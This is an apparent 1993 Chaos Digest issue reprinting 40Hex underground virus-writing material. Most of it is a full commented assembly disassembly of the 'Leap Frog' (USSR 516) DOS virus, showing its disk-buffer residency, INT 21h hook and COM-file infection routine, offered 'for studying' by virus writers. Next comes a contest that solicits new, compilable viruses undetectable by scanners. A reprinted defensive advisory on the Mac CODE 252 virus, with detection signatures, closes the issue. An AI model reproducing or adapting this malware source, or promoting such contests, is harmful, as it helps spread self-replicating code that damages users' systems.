Chaos Digest Vendredi 25 Juin 1993 Volume 1 : Numero 62 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.62 (25 Juin 1993) File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint) 40Hex Number 7 Volume 2 Issue 3 File 006 Virus Spotlite on: Leap Frog It's always interesting to find new residency techniques. I suppose everyone by now is tired of the traditional high-memory loading routine and is on the lookout for something different. 40Hex comes to the rescue! This virus, the "Leap Frog" or USSR 516, has one of the most unique methods I have ever seen. I was mucking around in VSUM and noticed that it, according to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS Stacks." She is, of course, not telling us the entire story. Leap Frog basically latches onto and resides in a DOS disk buffer. I do not know who the author is, but I commend him for his innovative technique. I took the liberty of disassembling the virus which is given below. It should be an exact byte-for-byte matchup of the original carrier file (or at least should be extremely similar). The offsets are in their correct locations, etc, etc. It is simple to understand and terribly efficient. Although the coding is tight, there are some inconsistencies. For example, I do not understand the purpose of the timing routine(int 21h/ah=30h) in the code. I also do not understand why the author decided to infect COM files in such an abnormal way. An interesting "feature" is the disabling of Control-Break checking - a thoroughly unnecessary piece of code. I believe further that the line above "findmarker" should read: lds di,dword ptr ds:[30h*4] In any case, the code is otherwise very, very good. It is great for studying by newcomers and "oldtimers" alike. Things to look for: Residency routine Lack of extensive use of relative offsets Use of stack frame in the interrupt handler Critical error handler Enjoy! Dark Angel of PHALCON/SKISM ussr516 segment byte public assume cs:ussr516, ds:ussr516 org 100h ;Disassembled by Dark Angel of PHALCON/SKISM ;for 40Hex Number 7 Volume 2 Issue 3 stub: db 0e9h, 0, 0 db 0e9h, 1, 0, 0 ;This is where the virus really begins start: push ax call beginvir orig4 db 0cdh, 20h, 0, 0 int30store db 0, 0, 0, 0 ;Actually it's int 21h ;entry point int21store db 0, 0, 0, 0 beginvir: pop bp ;BP -> orig4 mov si,bp mov di,103h add di,[di-2] ;DI -> orig4 movsw ;restore original movsw ;4 bytes of program xor si,si mov ds,si les di,dword ptr ds:[21h*4] mov [bp+8],di ;int21store mov [bp+0Ah],es lds di,dword ptr ds:[30h*4+1] ;Bug???? findmarker: inc di cmp word ptr [di-2],0E18Ah ;Find marker bytes jne findmarker ;to the entry point mov [bp+4],di ;and move to mov [bp+6],ds ;int30store mov ax,5252h ;Get list of lists int 21h ;and also ID check add bx,12h ;Already installed? jz quitvir ;then exit push bx mov ah,30h ;Get DOS version int 21h pop bx ;bx = 12, ptr to 1st ;disk buffer cmp al,3 je handlebuffer ;if DOS 3 ja handleDBHCH ;if > DOS 3 inc bx ;DOS 2.X, offset is 13 handlebuffer: push ds push bx lds bx,dword ptr [bx] ;Get seg:off of buffer inc si pop di pop es ;ES:DI->seg:off buff mov ax,[bx] ;ptr to next buffer cmp ax,0FFFFh ;least recently used? jne handlebuffer ;if not, go find it cmp si,3 jbe quitvir stosw stosw jmp short movetobuffer handleDBHCH: ;Disk Buffer Hash Chain Head array lds si,dword ptr [bx] ;ptr to disk buffer lodsw ;info lodsw ;seg of disk buffer ;hash chain head array inc ax ;second entry mov ds,ax xor bx,bx mov si,bx lodsw ;EMS page, -1 if not ;in EMS xchg ax,di ;save in di lodsw ;ptr to least recently ;used buffer mov [di+2],ax ;change disk buffer ;backward offset to ;least recently used xchg ax,di ;restore EMS page mov [di],ax ;set to least recently movetobuffer: ;used mov di,bx push ds pop es ;ES:DI -> disk buffer push cs pop ds mov cx,108h lea si,[bp-4] ;Copy from start rep movsw mov ds,cx ;DS -> interrupt table mov word ptr ds:[4*21h],0BCh ;New interrupt handler mov word ptr ds:[4*21h+2],es ;at int21 quitvir: push cs ;CS = DS = ES pop es push es pop ds pop ax mov bx,ax mov si, 100h ;set up stack for push si ;the return to the retn ;original program int24: mov al,3 ;Ignore all errors iret tickstore db 3 ;Why??? buffer db 3, 0, 9, 0 int21: pushf cli ;CP/M style call entry call dword ptr cs:[int30store-start] retn ;point of int 21h int21DSDX: ;For int 21h calls push ds ;with lds dx,dword ptr [bp+2] ;DS:DX -> filename call int21 pop ds retn cmp ax,4B00h ;Execute je Execute cmp ax,5252h ;ID check je CheckID cmp ah,30h ;DOS Version je DosVersion callorig21: ;Do other calls jmp dword ptr cs:[int21store-start] DosVersion: ;Why????? ;DOS Version dec byte ptr cs:[tickstore-start] jnz callorig21 ;Continue if not 0 push es xor ax,ax push ax mov es,ax mov al,es:[46Ch] ; 40h:6Ch = Timer ticks ; since midnight and al,7 ; MOD 15 inc ax inc ax mov cs:[tickstore-start],al ;# 2-17 pop ax pop es iret CheckID: ;ID Check mov bx,0FFEEh ;FFEEh = -12h iret Execute: ;Execute push ax ;Save registers push cx push es push bx push ds ;DS:DX -> filename push dx ;save it on stack push bp mov bp,sp ;Set up stack frame sub sp,0Ah ;Temporary variables ;[bp-A] = attributes ;[bp-8] = int 24 off ;[bp-6] = int 24 seg ;[bp-4] = file time ;[bp-2] = file date sti push cs pop ds mov ax,3301h ;Turn off ^C check xor dl,dl ;(never turn it back call int21 ; on. Bug???) mov ax,3524h ;Get int 24h call int21 ;(Critical error) mov [bp-8],bx mov [bp-6],es mov dx,int24-start mov ax,2524h ;Set to new one call int21 mov ax,4300h ;Get attributes call int21DSDX jnc continue doneinfect: mov ax,2524h ;Restore crit error lds dx,dword ptr [bp-8] ;handler call int21 cli mov sp,bp pop bp pop dx pop ds pop bx pop es pop cx pop ax jmp short callorig21 ;Call orig handler continue: mov [bp-0Ah],cx ;Save attributes test cl,1 ;Check if r/o???? jz noclearattr xor cx,cx mov ax,4301h ;Clear attributes call int21DSDX ;Filename in DS:DX jc doneinfect ;Quit on error noclearattr: mov ax,3D02h ;Open read/write call int21DSDX ;Filename in DS:DX jc doneinfect ;Exit if error mov bx,ax mov ax,5700h ;Save time/date call int21 mov [bp-4],cx mov [bp-2],dx mov dx,buffer-start mov cx,4 mov ah,3Fh ;Read 4 bytes to call int21 ;buffer jc quitinf cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h jne quitinf ;Otherwise, quit mov dx,word ptr ds:[buffer+1-start];dx = jmploc dec dx xor cx,cx mov ax,4201h ;go there call int21 mov ds:[buffer-start],ax ;new location offset mov dx,orig4-start mov cx,4 mov ah,3Fh ;Read 4 bytes there call int21 mov dx,ds:[orig4-start] cmp dl,0E9h ;0E9h means we might jne infect ;already be there mov ax,ds:[orig4+2-start] ;continue checking add al,dh ;to see if we really sub al,ah ;are there. jz quitinf infect: xor cx,cx mov dx,cx mov ax,4202h ;Go to EOF call int21 mov ds:[buffer+2-start],ax ;save filesize mov cx,204h mov ah,40h ;Write virus call int21 jc quitinf ;Exit if error sub cx,ax jnz quitinf mov dx,ds:[buffer-start] mov ax,ds:[buffer+2-start] sub ax,dx sub ax,3 ;AX->jmp offset mov word ptr ds:[buffer+1-start],ax;Set up buffer mov byte ptr ds:[buffer-start],0E9h;code the jmp add al,ah mov byte ptr ds:[buffer+3-start],al mov ax,4200h ;Rewind to jmploc call int21 mov dx, buffer-start mov cx,4 ;Write in the jmp mov ah,40h call int21 quitinf: mov cx,[bp-4] mov dx,[bp-2] mov ax,5701h ;Restore date/time call int21 mov ah,3Eh ;Close file call int21 mov cx,[bp-0Ah] ;Restore attributes mov ax,4301h call int21DSDX jmp doneinfect ;Return ussr516 ends end stub +++++ 40Hex Number 7 Volume 2 Issue 3 File 007 Just a friendly reminder: ------------------------ Virus Contest! 'The Spammies(tm)' ------------------------ Deadline: July 4th, 1992 This is the first PHALCON/SKISM virus contest. As a matter of fact, this is the first contest of its kind. We believe that it will motivate you to produce more original code, rather than more hacks. Winners may have already won $10,000,000, as well as the prestige of winning the first ever 'Spammie' awards. Rules and Regulations: 1) All submissions must be original source code. (no hacks) 2) Only one submission is allowed per programmer, plus one group project. 3) All viruses must be recieved by us before July 4th, 1992. 4) Viruses must be accompanied by a complete entry form. (see below) 5) The original, compilable, commented source MUST be included, along with an installer program, or a dropper, in the case of boot block viruses. 6) Entries must include a location where the author may be contacted, such as an email address or a BBS. 7) Personnel or persons related to personnel of PHALCON/SKISM are not eligable. 8) The source must compile without error under Tasm or Masm (please specify what assembler and version you used, along with the necessary command line switches). If we cannot compile your virus, it will be disqualified. 9) All entries recieve a free subscription to 40hex. (hehehehe) 10) The entry must be uploaded privately to the sysop, stating that it is a contest entry. 11) The viruses must not be detectable by the current version (as of July 4th) of any known virus scanner. 12) Viruses will be judged by our 'panel of experts' in three catagories. 6.1) Stealth 6.2) Size 6.3) Reproductivity 6.4) Performance For example, Red Cross is an example of a 'high performance' virus. It was entertaining and well done. *** Entry Form Handle ________________________ Group Afiliation ______________ Virus Name ____________________ Size ____bytes (if you need more spaces, go away) Type ___ File Infector ___ Boot block Infection method ___ Direct Action ___ Memory Resident ___ Directory chain ___ Other (please describe it in detail) Encryption routine ___ None (bah) ___ Xor loop ___ Other (please describe it in detail) Describe what makes your infection routine unique. ______________________________________________________________________________ _ ______________________________________________________________________________ _ Describe what makes your encryption routine unique. ______________________________________________________________________________ _ ______________________________________________________________________________ _ Describe what means your virus uses, other than encryption, to keep itself hidden. ______________________________________________________________________________ _ ______________________________________________________________________________ _ What is the largest possible scan string for this virus? __bytes What else sets this virus apart from other viruses? ______________________________________________________________________________ _ ______________________________________________________________________________ _ ______________________________________________________________________________ _ +++++ 40Hex Number 7 Volume 2 Issue 3 File 008 More Virus News. An informed virus Programmer is a good one. Article 1: New Macintosh Virus Article 2: RockSteady's 666 Virus [NuKE] Article 3: A Stooge's View <<<<<<<<< Article 1 <<<<<<<<< Date: Fri, 17 Apr 92 11:34:50 -0500 >From: Gene Spafford Subject: Mac announcement - new virus (Mac) New Macintosh Virus Discovered 17 April 1992 Virus: CODE 252 Damage: some, possibly severe (see text) Spread: unknown (see text) Systems affected: Apple Macintosh computers. All types, but see text. A new virus, which has been designated "CODE 252", has been discovered on Apple Macintosh computer systems. This virus is designed to trigger if an infected application is run or system booted between June 6 and December 31, inclusive. When triggered, the virus brings up a dialog box with the message: You have a virus. Ha Ha Ha Ha Ha Ha Ha Now erasing all disks... Ha Ha Ha Ha Ha Ha Ha P.S. Have a nice day. Ha Ha Ha Ha Ha Ha Ha (Click to continue...) Despite this message, no files or directories are deleted in the versions of the virus we have seen; however, a worried user might power down the system upon seeing the message, and thus corrupt the disk -- this could lead to significant damage. Furthermore, the virus may interact with some applications in such a manner as to damage them. Under System 7, the System file can be seriously damaged by the virus under at least some circumstances as the virus attempts to spread. This may lead to a system that will not boot, crashes, or other unusual behavior. Between January 1 and June 5, inclusive, the virus simply spreads from applications to system files, and then on to other application files. At the present moment, we have no indication that the virus causes direct damage to any existing applications. The virus does not spread to other applications under MultiFinder on System 6.x systems, nor will it spread under System 7. However, it will run on those systems if an infected application is executed. Even if you are running one of these systems, we recommend you obtain an use one of latest versions of appropriate anti-virus software. As of the date of this announcement (17 April 92), we have had limited reported sightings of this virus. This, combined with the nature of operation of the virus, leads us to believe that the virus is not yet widespread. The current versions of Gatekeeper and SAM Intercept (in advanced and custom mode) are effective against this virus. Either program should generate an alert if the virus is present and attempts to spread to other files. The Virex Record/Scan feature will also detect the virus. Authors of all major Macintosh anti-virus tools are planning updates to their tools to locate and/or eliminate this virus. Some of these are listed below. We recommend that you obtain and run a CURRENT version of AT LEAST ONE of these programs. Some specific information on updated Mac anti-virus products follows: Tool: Disinfectant Status: Free software (courtesy of Northwestern University and John Norstad) Revision to be released: 2.8 Where to find: usual archive sites and bulletin boards -- ftp.acns.nwu.edu, sumex-aim.stanford.edu, rascal.ics.utexas.edu, AppleLink, America Online, CompuServe, Genie, Calvacom, MacNet, Delphi, comp.binaries.mac When available: soon Tool: Gatekeeper Status: Free software (courtesy of Chris Johnson) Revision to be released: 1.2.6 (probably) Where to find: usual archive sites and bulletin boards -- microlib.cc.utexas.edu, sumex-aim.stanford.edu, rascal.ics.utexas.edu, comp.binaries.mac When available: eventually Comments: Gatekeeper should find this virus if it attempts to infect your system or applications, and thus does not need an update. Gatekeeper Aid will need an update to "know" exactly what virus it is seeing so it can remove the virus, but the update is not crucial for continued protection. As Gatekeeper is freeware and Chris has a "real" life, this update may not be immediate. Tool: Rival Status: Commercial software Revision to be released: Rival 1.1.9v (CODE 252 Vaccine or Refresh 1.1.9v) Where to find it: AppleLink, America Online, Internet, Compuserve. When available: Immediately. Tool: SAM (Virus Clinic and Intercept) Status: Commercial software Revision to be released: 3.0.8 Where to find: CompuServe, America Online, Applelink, Symantec's Bulletin Board @ 408-973-9598 When available: 17 April 1992. Version 3.0.8 of the Virus Definitions file are also available. Tool: Virex INIT Status: Commercial software Revision to be released: 3.8 Where to find: Microcom, Inc (919) 490-1277 When available: Immediately. Comments: Virex 3.8 will detect and repair the virus. All Virex subscribers will automatically be sent an update on diskette. All other registered users will receive a notice with information to update prior versions to be able to detect CODE 252. This information is also available on Microcom's BBS. (919)419-1602, and is presented here: Guide Number = 6324448 1: 0203 3001 7778 2A00 / 79 2: 0C50 4EFA 0003 A9AB / C4 3: 0004 A9AA 0002 A647 / B2 4: 8180 9090 9090 9090 / 1B Tool: Virus Detective Status: Shareware Revision to be released: 5.0.4 Where to find: Usual bulletin boards will announce a new search string. Registered users will also get a mailing with the new search string. When available: Immediately. Comments: search strings are: Resource Start & Size < 1200 & WData 2F2C#23F3C#2A9A0*3F3C#24878#2A9AB; For find CODE 252 in Appl's Filetype=ZSYS & Resource INIT & Size < 1200 & WData 2F2C# 3F3C#2A9A0*3F3C#24878 #2A9AB; For find CODE 252 in System If you discover what you believe to be a virus on your Macintosh system, please report it to the vendor/author of your anti-virus software package for analysis. Such reports make early, informed warnings like this one possible for the rest of the Mac community. ------------------------------ End of Chaos Digest #1.62 ************************************